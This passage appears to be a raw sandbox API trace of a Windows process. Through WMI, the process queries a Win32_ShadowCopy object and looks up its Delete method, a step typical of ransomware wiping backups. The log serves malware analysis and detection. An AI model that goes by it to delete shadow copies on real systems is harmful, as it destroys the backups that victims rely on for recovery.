wszName="__DERIVATION", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=0, plFlavor=0x1c64ccc8*=0 | out: pVal=0x1c64ccd0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b792340*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b77b2f0, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x1c64cccc*=8200, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.427] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__SERVER", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=0, plFlavor=0x1c64ccc8*=0 | out: pVal=0x1c64ccd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c64cccc*=8, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.427] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0109.427] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=0, plFlavor=0x1c64ccc8*=0 | out: pVal=0x1c64ccd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64cccc*=8, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.427] SysStringLen (param_1="root\\cimv2") returned 0xa [0109.427] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__PATH", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=0, plFlavor=0x1c64ccc8*=0 | out: pVal=0x1c64ccd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"", varVal2=0x0), pType=0x1c64cccc*=8, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.427] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{4FE73A95-BB7F-48F7-BF4C-A89DCEB97CC9}\"") returned 0x53 [0109.427] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8e1390, puCount=0x1c64cd70 | out: puCount=0x1c64cd70*=0x2) returned 0x0 [0109.427] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cd70*=0x0, pszText=0x0 | out: puBuffLength=0x1c64cd70*=0x17, pszText=0x0) returned 0x0 [0109.428] WbemDefPath:IWbemPath:GetText (in: This=0x1c8e1390, lFlags=4, puBuffLength=0x1c64cd70*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c64cd70*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0109.428] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="Delete", lFlags=0, pVal=0x1c64cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cd5c*=0, plFlavor=0x1c64cd58*=0 | out: pVal=0x1c64cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cd5c*=0, plFlavor=0x1c64cd58*=0) returned 0x80041002 [0109.429] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x1c64cdc8 | out: pperrinfo=0x1c64cdc8*=0x0) returned 0x1 [0109.430] IIDFromString (in: lpsz="{EB87E1BD-3233-11D2-AEC9-00C04FB68820}", lpiid=0x1c64cbc0 | out: lpiid=0x1c64cbc0) returned 0x0 [0109.430] CoGetClassObject (in: rclsid=0x1b792338*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64ca30 | out: ppv=0x1c64ca30*=0x1c8f17c0) returned 0x0 [0109.432] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f17c0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64c740 | out: ppvObject=0x1c64c740*=0x0) returned 0x80004002 [0109.432] WbemStatusCodeText:IClassFactory:CreateInstance (in: This=0x1c8f17c0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c728 | out: ppvObject=0x1c64c728*=0x1c8f17e0) returned 0x0 [0109.432] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f17e0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c630 | out: ppvObject=0x1c64c630*=0x1c8f17e0) returned 0x0 [0109.432] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f17e0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64c6b0 | out: ppvObject=0x1c64c6b0*=0x0) returned 0x80004002 [0109.433] WbemStatusCodeText:IUnknown:AddRef (This=0x1c8f17e0) returned 0x3 [0109.433] CoGetContextToken (in: pToken=0x1c64c300 | out: pToken=0x1c64c300) returned 0x0 [0109.433] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f17e0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c2c0 | out: ppvObject=0x1c64c2c0*=0x0) returned 0x80004002 [0109.433] CoGetContextToken (in: pToken=0x1c64c2d0 | out: pToken=0x1c64c2d0) returned 0x0 [0109.433] WbemStatusCodeText:IUnknown:AddRef (This=0x1c8f17e0) returned 0x4 [0109.433] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f17e0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64c3e8 | out: ppvObject=0x1c64c3e8*=0x0) returned 0x80004002 [0109.434] WbemStatusCodeText:IUnknown:Release (This=0x1c8f17e0) returned 0x3 [0109.434] WbemStatusCodeText:IUnknown:Release (This=0x1c8f17e0) returned 0x2 [0109.434] WbemStatusCodeText:IUnknown:Release (This=0x1c8f17c0) returned 0x0 [0109.434] WbemStatusCodeText:IUnknown:Release (This=0x1c8f17e0) returned 0x1 [0109.435] CoGetContextToken (in: pToken=0x1c64c8f0 | out: pToken=0x1c64c8f0) returned 0x0 [0109.435] CoGetContextToken (in: pToken=0x1c64c830 | out: pToken=0x1c64c830) returned 0x0 [0109.435] WbemStatusCodeText:IUnknown:AddRef (This=0x1c8f17e0) returned 0x2 [0109.435] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f17e0, riid=0x1c64c970*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppvObject=0x1c64c950 | out: ppvObject=0x1c64c950*=0x1c8f17e0) returned 0x0 [0109.435] WbemStatusCodeText:IUnknown:Release (This=0x1c8f17e0) returned 0x2 [0109.435] WbemStatusCodeText:IUnknown:Release (This=0x1c8f17e0) returned 0x1 [0109.437] CoGetContextToken (in: pToken=0x1c64ca70 | out: pToken=0x1c64ca70) returned 0x0 [0109.437] CoGetContextToken (in: pToken=0x1c64c9b0 | out: pToken=0x1c64c9b0) returned 0x0 [0109.437] WbemStatusCodeText:IUnknown:AddRef (This=0x1c8f17e0) returned 0x2 [0109.437] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1c8f17e0, riid=0x1c64caf0*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppvObject=0x1c64cad0 | out: ppvObject=0x1c64cad0*=0x1c8f17e0) returned 0x0 [0109.437] WbemStatusCodeText:IUnknown:Release (This=0x1c8f17e0) returned 0x2 [0109.437] WbemStatusCodeText:IUnknown:AddRef (This=0x1c8f17e0) returned 0x3 [0109.437] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x1c8f17e0, hRes=0xffffffff80041002, LocaleId=0x0, lFlags=1, MessageText=0x1c64cda8 | out: MessageText=0x1c64cda8*="Not found ") returned 0x0 [0109.442] WbemStatusCodeText:IUnknown:Release (This=0x1c8f17e0) returned 0x2 [0109.443] SysStringLen (param_1="Not found ") returned 0xa [0109.461] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__SERVER", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=0, plFlavor=0x1c64ccc8*=0 | out: pVal=0x1c64ccd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c64cccc*=8, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.461] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0109.461] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__NAMESPACE", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=8, plFlavor=0x1c64ccc8*=64 | out: pVal=0x1c64ccd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c64cccc*=8, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.461] SysStringLen (param_1="root\\cimv2") returned 0xa [0109.461] IWbemClassObject:Get (in: This=0x1c8f4830, wszName="__CLASS", lFlags=0, pVal=0x1c64ccd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c64cccc*=8, plFlavor=0x1c64ccc8*=64 | out: pVal=0x1c64ccd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c64cccc*=8, plFlavor=0x1c64ccc8*=64) returned 0x0 [0109.461] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0109.461] CoGetObjectContext (in: riid=0x1c64cb78*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cb70 | out: ppv=0x1c64cb70*=0x212498) returned 0x0 [0109.462] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64cb90 | out: pAptType=0x1c64cb90*=1) returned 0x0 [0109.462] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64cc98 | out: ppvObject=0x1c64cc98*=0x0) returned 0x80004002 [0109.462] IUnknown:Release (This=0x212498) returned 0x1 [0109.462] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c200 | out: ppv=0x1c64c200*=0x1c8f17c0) returned 0x0 [0109.462] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f17c0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64bf10 | out: ppvObject=0x1c64bf10*=0x0) returned 0x80004002 [0109.463] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f17c0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bef8 | out: ppvObject=0x1c64bef8*=0x1c8f6dc0) returned 0x0 [0109.463] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6dc0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64be00 | out: ppvObject=0x1c64be00*=0x1c8f6dc0) returned 0x0 [0109.463] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6dc0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64be80 | out: ppvObject=0x1c64be80*=0x0) returned 0x80004002 [0109.463] WbemDefPath:IUnknown:AddRef (This=0x1c8f6dc0) returned 0x3 [0109.463] CoGetContextToken (in: pToken=0x1c64bad0 | out: pToken=0x1c64bad0) returned 0x0 [0109.463] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6dc0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ba90 | out: ppvObject=0x1c64ba90*=0x1b796ae0) returned 0x0 [0109.463] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b796ae0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64bac0 | out: pCid=0x1c64bac0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0109.464] WbemDefPath:IUnknown:Release (This=0x1b796ae0) returned 0x3 [0109.464] CoGetContextToken (in: pToken=0x1c64baa0 | out: pToken=0x1c64baa0) returned 0x0 [0109.464] WbemDefPath:IUnknown:AddRef (This=0x1c8f6dc0) returned 0x4 [0109.464] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6dc0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bbb8 | out: ppvObject=0x1c64bbb8*=0x0) returned 0x80004002 [0109.464] WbemDefPath:IUnknown:Release (This=0x1c8f6dc0) returned 0x3 [0109.464] WbemDefPath:IUnknown:Release (This=0x1c8f6dc0) returned 0x2 [0109.464] WbemDefPath:IUnknown:Release (This=0x1c8f17c0) returned 0x0 [0109.464] WbemDefPath:IUnknown:Release (This=0x1c8f6dc0) returned 0x1 [0109.465] CoGetContextToken (in: pToken=0x1c64c7d0 | out: pToken=0x1c64c7d0) returned 0x0 [0109.465] CoGetContextToken (in: pToken=0x1c64c710 | out: pToken=0x1c64c710) returned 0x0 [0109.465] WbemDefPath:IUnknown:AddRef (This=0x1c8f6dc0) returned 0x2 [0109.465] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6dc0, riid=0x1c64c850*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c830 | out: ppvObject=0x1c64c830*=0x1c8f6dc0) returned 0x0 [0109.465] WbemDefPath:IUnknown:Release (This=0x1c8f6dc0) returned 0x2 [0109.465] WbemDefPath:IUnknown:Release (This=0x1c8f6dc0) returned 0x1 [0109.465] CoGetContextToken (in: pToken=0x1c64c950 | out: pToken=0x1c64c950) returned 0x0 [0109.465] CoGetContextToken (in: pToken=0x1c64c890 | out: pToken=0x1c64c890) returned 0x0 [0109.465] WbemDefPath:IUnknown:AddRef (This=0x1c8f6dc0) returned 0x2 [0109.465] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6dc0, riid=0x1c64c9d0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c9b0 | out: ppvObject=0x1c64c9b0*=0x1c8f6dc0) returned 0x0 [0109.465] WbemDefPath:IUnknown:Release (This=0x1c8f6dc0) returned 0x2 [0109.465] WbemDefPath:IUnknown:AddRef (This=0x1c8f6dc0) returned 0x3 [0109.465] WbemDefPath:IWbemPath:SetText (This=0x1c8f6dc0, uMode=0x4, pszPath="") returned 0x0 [0109.465] WbemDefPath:IUnknown:Release (This=0x1c8f6dc0) returned 0x2 [0109.466] CoGetObjectContext (in: riid=0x1c64cb78*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cb70 | out: ppv=0x1c64cb70*=0x212498) returned 0x0 [0109.466] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64cb90 | out: pAptType=0x1c64cb90*=1) returned 0x0 [0109.466] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64cc98 | out: ppvObject=0x1c64cc98*=0x0) returned 0x80004002 [0109.466] IUnknown:Release (This=0x212498) returned 0x1 [0109.466] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c200 | out: ppv=0x1c64c200*=0x1c8f17c0) returned 0x0 [0109.467] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f17c0, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c64bf10 | out: ppvObject=0x1c64bf10*=0x0) returned 0x80004002 [0109.467] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1c8f17c0, pUnkOuter=0x0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bef8 | out: ppvObject=0x1c64bef8*=0x1c8f6ec0) returned 0x0 [0109.467] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6ec0, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64be00 | out: ppvObject=0x1c64be00*=0x1c8f6ec0) returned 0x0 [0109.467] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6ec0, riid=0x7fef2a9d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c64be80 | out: ppvObject=0x1c64be80*=0x0) returned 0x80004002 [0109.467] WbemDefPath:IUnknown:AddRef (This=0x1c8f6ec0) returned 0x3 [0109.467] CoGetContextToken (in: pToken=0x1c64bad0 | out: pToken=0x1c64bad0) returned 0x0 [0109.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6ec0, riid=0x7fef2a9d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64ba90 | out: ppvObject=0x1c64ba90*=0x1b796b00) returned 0x0 [0109.468] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b796b00, riid=0x7fef2a9d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c64bac0 | out: pCid=0x1c64bac0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0109.468] WbemDefPath:IUnknown:Release (This=0x1b796b00) returned 0x3 [0109.468] CoGetContextToken (in: pToken=0x1c64baa0 | out: pToken=0x1c64baa0) returned 0x0 [0109.468] WbemDefPath:IUnknown:AddRef (This=0x1c8f6ec0) returned 0x4 [0109.468] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6ec0, riid=0x7fef2a9d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c64bbb8 | out: ppvObject=0x1c64bbb8*=0x0) returned 0x80004002 [0109.468] WbemDefPath:IUnknown:Release (This=0x1c8f6ec0) returned 0x3 [0109.468] WbemDefPath:IUnknown:Release (This=0x1c8f6ec0) returned 0x2 [0109.468] WbemDefPath:IUnknown:Release (This=0x1c8f17c0) returned 0x0 [0109.469] WbemDefPath:IUnknown:Release (This=0x1c8f6ec0) returned 0x1 [0109.469] CoGetContextToken (in: pToken=0x1c64c7d0 | out: pToken=0x1c64c7d0) returned 0x0 [0109.469] CoGetContextToken (in: pToken=0x1c64c710 | out: pToken=0x1c64c710) returned 0x0 [0109.469] WbemDefPath:IUnknown:AddRef (This=0x1c8f6ec0) returned 0x2 [0109.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6ec0, riid=0x1c64c850*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c830 | out: ppvObject=0x1c64c830*=0x1c8f6ec0) returned 0x0 [0109.469] WbemDefPath:IUnknown:Release (This=0x1c8f6ec0) returned 0x2 [0109.469] WbemDefPath:IUnknown:Release (This=0x1c8f6ec0) returned 0x1 [0109.469] CoGetContextToken (in: pToken=0x1c64c950 | out: pToken=0x1c64c950) returned 0x0 [0109.469] CoGetContextToken (in: pToken=0x1c64c890 | out: pToken=0x1c64c890) returned 0x0 [0109.469] WbemDefPath:IUnknown:AddRef (This=0x1c8f6ec0) returned 0x2 [0109.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f6ec0, riid=0x1c64c9d0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c64c9b0 | out: ppvObject=0x1c64c9b0*=0x1c8f6ec0) returned 0x0 [0109.469] WbemDefPath:IUnknown:Release (This=0x1c8f6ec0) returned 0x2 [0109.470] WbemDefPath:IUnknown:AddRef (This=0x1c8f6ec0) returned 0x3 [0109.470] WbemDefPath:IWbemPath:SetText (This=0x1c8f6ec0, uMode=0x4, pszPath="") returned 0x0 [0109.470] WbemDefPath:IUnknown:Release (This=0x1c8f6ec0) returned 0x2 [0109.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f6ec0, puCount=0x1c64cc70 | out: puCount=0x1c64cc70*=0x0) returned 0x0 [0109.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1c8f6dc0, puCount=0x1c64cc70 | out: puCount=0x1c64cc70*=0x0) returned 0x0 [0109.470] WbemDefPath:IWbemPath:GetClassName (in: This=0x1c8f6ec0, puBuffLength=0x1c64cd10*=0x0, pszName=0x0 | out: puBuffLength=0x1c64cd10*=0x0, pszName=0x0) returned 0x8004103a [0109.471] WbemDefPath:IWbemPath:GetServer (in: This=0x1c8f6ec0, puNameBufLength=0x1c64cd10*=0x0, pName=0x0 | out: puNameBufLength=0x1c64cd10*=0x0, pName=0x0) returned 0x80041009 [0109.472] WbemDefPath:IWbemPath:SetServer (This=0x1c8f6ec0, Name="XDUWTFONO") returned 0x0 [0109.472] CoGetObjectContext (in: riid=0x1c64cb78*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64cb70 | out: ppv=0x1c64cb70*=0x212498) returned 0x0 [0109.472] IComThreadingInfo:GetCurrentApartmentType (in: This=0x212498, pAptType=0x1c64cb90 | out: pAptType=0x1c64cb90*=1) returned 0x0 [0109.472] IUnknown:QueryInterface (in: This=0x212498, riid=0x359dd40*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c64cc98 | out: ppvObject=0x1c64cc98*=0x0) returned 0x80004002 [0109.472] IUnknown:Release (This=0x212498) returned 0x1 [0109.472] CoGetClassObject (in: rclsid=0x1b7738e8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2a9d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c64c200 | out: ppv=0x1c64c200*=0x1c8f1800) returned 0x0 [0109.473] WbemDefPath:IUnknown:QueryInterface (in: This=0x1c8f1800, riid=0x7fef2a9d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), 